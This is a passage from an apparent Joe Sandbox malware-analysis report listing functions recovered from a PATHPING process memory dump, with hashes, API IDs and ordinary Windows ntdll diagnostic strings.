                                                                                                                        • Instruction Fuzzy Hash: 0F51E7B6A00116BFCF20EF99C99097EF7B8BB4D200714866AE465D7741D334DE558BA0
                                                                                                                        Function 036F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: 91f91a4eeda78f5adb06bc249a176e71d936f22ca889aa2ece8c02f689eccfa1
                                                                                                                        • Instruction ID: 6b73a58000ec13d55c4c3fdc65e8b2671598fe33223b76605464eb05d7ff778d
                                                                                                                        • Opcode Fuzzy Hash: 91f91a4eeda78f5adb06bc249a176e71d936f22ca889aa2ece8c02f689eccfa1
                                                                                                                        • Instruction Fuzzy Hash: 4B510779A04A45AFDB30DF9CC9A097FB7FDEB44200B14885AE695C7741D7B4DA408F60
                                                                                                                        Function 03677630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 036B4787
                                                                                                                        • ExecuteOptions, xrefs: 036B46A0
                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 036B4655
                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 036B4742
                                                                                                                        • Execute=1, xrefs: 036B4713
                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036B46FC
                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 036B4725
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                        • API String ID: 0-484625025
                                                                                                                        • Opcode ID: 9bb1e9473e8942631fd4c26c857877589d92a9f2df8bf7ea28b179c4b6f0f642
                                                                                                                        • Instruction ID: 8523ee04ce6466d4303f8fdcf8b706f55c314f2b2ca07e6df55e352f29042104
                                                                                                                        • Opcode Fuzzy Hash: 9bb1e9473e8942631fd4c26c857877589d92a9f2df8bf7ea28b179c4b6f0f642
                                                                                                                        • Instruction Fuzzy Hash: 48510635A003197ADF21EBA4DD89BFEB7B8EF09300F4401ADD505AB281EB71AA51CF54
                                                                                                                        Function 03716940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                        • Instruction ID: b92ac7b2eae562753120d656c39eb4634c0501528d8874b6e25cd25f4f34df26
                                                                                                                        • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                        • Instruction Fuzzy Hash: 01021376508341AFC719DF1CC894A6BBBE5FFC8700F148A2DB9899B264DB31E915CB42
                                                                                                                        Function 0368B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-$0$0
                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                        • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                        • Instruction ID: 1836861553a43b0b719ba955df938e4090e5e8ff5b7aa93f9a2ad08c5548fda1
                                                                                                                        • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                        • Instruction Fuzzy Hash: 8781DE70E052499EDF28EF68C9917FEBBB2AF4D320F1C475AD861A7390C73498918B54
                                                                                                                        Function 036F20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                                        • API String ID: 48624451-2819853543
                                                                                                                        • Opcode ID: afcb3a3da2ee711e0f00732ce79c2df49fa9ea84a94d413440cabd3bf78b9229
                                                                                                                        • Instruction ID: ba3f42ce0ed77eba77b59dd766d83b790abdc7e78a7027f15991c83f243ba0c8
                                                                                                                        • Opcode Fuzzy Hash: afcb3a3da2ee711e0f00732ce79c2df49fa9ea84a94d413440cabd3bf78b9229
                                                                                                                        • Instruction Fuzzy Hash: B221567AA002199FDB10EF69C950AEFBBFCEF49640F48051AEA05D7304E730D9158B95
                                                                                                                        Function 0366F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036B02BD
                                                                                                                        • RTL: Re-Waiting, xrefs: 036B031E
                                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036B02E7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                        • API String ID: 0-2474120054
                                                                                                                        • Opcode ID: 445e0fca05114986f020ed6c7e33f968ca7629f6ca5f4df258b33f6c1a93f0bb
                                                                                                                        • Instruction ID: 33801864462644acc323adb9587b5bbf1480c5068e5a6a111afe2bf23d7d68b1
                                                                                                                        • Opcode Fuzzy Hash: 445e0fca05114986f020ed6c7e33f968ca7629f6ca5f4df258b33f6c1a93f0bb
                                                                                                                        • Instruction Fuzzy Hash: 70E1CB306087419FD724CF28D984B6ABBF0BB89364F180A6DF4A58B3E1D774D885CB52
                                                                                                                        Function 0367BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 036B7B7F
                                                                                                                        • RTL: Re-Waiting, xrefs: 036B7BAC
                                                                                                                        • RTL: Resource at %p, xrefs: 036B7B8E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 0-871070163
                                                                                                                        • Opcode ID: 74b76e62d3a6c46bdbdb4a3e3437f6cd762f08fcb0903a18170663862004a752
                                                                                                                        • Instruction ID: b72cbaab32a3ce6d8185ad310904e04ded622e3b94da709e7e58b82312097c96
                                                                                                                        • Opcode Fuzzy Hash: 74b76e62d3a6c46bdbdb4a3e3437f6cd762f08fcb0903a18170663862004a752
                                                                                                                        • Instruction Fuzzy Hash: 6D410E353047029FC724DE28C940B6AB7E5EF89B20F040A2DF85ADB380DB31E9468F95
                                                                                                                        Function 0367B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036B728C
                                                                                                                        Strings
                                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 036B7294
                                                                                                                        • RTL: Re-Waiting, xrefs: 036B72C1
                                                                                                                        • RTL: Resource at %p, xrefs: 036B72A3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                        • API String ID: 885266447-605551621
                                                                                                                        • Opcode ID: 4f9e898d3dcf209f05892b8a4b4cd6daefe86cad4442f227981c17f9ff25ff54
                                                                                                                        • Instruction ID: a95f557e418926ff12728192d3db84233a7aa58af4acf7957d258fc899e431f4
                                                                                                                        • Opcode Fuzzy Hash: 4f9e898d3dcf209f05892b8a4b4cd6daefe86cad4442f227981c17f9ff25ff54
                                                                                                                        • Instruction Fuzzy Hash: DA41DF35700706AFD720DE25CD41BAABBB5FF84710F180619F995AB344DB31E8928BE9
                                                                                                                        Function 036F2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$]:%u
                                                                                                                        • API String ID: 48624451-3050659472
                                                                                                                        • Opcode ID: 27703e55c858a4f606b03fba3c9ad70b41872298e0c4cddef4cd6bb666b7dc95
                                                                                                                        • Instruction ID: dd0740dbf966d0fbfdbe93b1db55dc66cd2ab903af29489fac4c384fa6034e75
                                                                                                                        • Opcode Fuzzy Hash: 27703e55c858a4f606b03fba3c9ad70b41872298e0c4cddef4cd6bb666b7dc95
                                                                                                                        • Instruction Fuzzy Hash: 5331867AA006199FDB20DF29CD50BEEB7B8EB44610F44495AE949E7200EB30DA458FA0
                                                                                                                        Function 03687D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-
                                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                                        • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                        • Instruction ID: e1b12dbbee546015ec9bae6fd7d143c70fa85271bba01b2723a649b7ff4a639e
                                                                                                                        • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                        • Instruction Fuzzy Hash: 6591A371E0021A9BDB24EF6AC9816BEB7B5AF4C320F78471AE865E73C0D7709941C720
                                                                                                                        Function 03649126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.4135962637.0000000003610000.00000040.00001000.00020000.00000000.sdmp, Offset: 03610000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.4135962637.0000000003739000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.000000000373D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.4135962637.00000000037AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_3610000_PATHPING.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: $$@
                                                                                                                        • API String ID: 0-1194432280
                                                                                                                        • Opcode ID: 959b8ea0a9a5d0f7363b5bea4138c2fd2983f55006862a027ad765fe06a64b7d
                                                                                                                        • Instruction ID: a3d57c0973819e79328da7279c1e9b55f4e9699e681531cef92949a083baa94f
                                                                                                                        • Opcode Fuzzy Hash: 959b8ea0a9a5d0f7363b5bea4138c2fd2983f55006862a027ad765fe06a64b7d
                                                                                                                        • Instruction Fuzzy Hash: A2813A75D402699BDB21DB54CD54BEEBBB8AF08750F0445EAE909B7280D7309E81CFA4